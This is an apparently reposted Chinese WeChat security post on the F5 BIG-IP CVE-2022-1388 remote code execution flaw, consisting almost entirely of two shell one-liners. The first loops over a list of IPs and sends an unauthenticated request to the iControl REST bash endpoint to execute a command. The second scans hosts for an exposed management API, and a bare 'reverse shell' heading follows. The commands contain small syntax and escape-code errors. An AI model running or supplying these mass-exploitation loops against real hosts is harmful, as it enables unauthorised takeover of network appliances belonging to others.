检测
cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done
cat ips.txt | while read host do; do curl -sk "https://$host/mgmt/shared/authn/login" | grep -q 'resterrorresponse' && printf "$host 331;41mF5 iControl REST API Exposede[0mn"; done
反弹shell
原文始发于微信公众号(关注安全技术):F5 BIG-IP(CVE-2022-1388) RCE
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论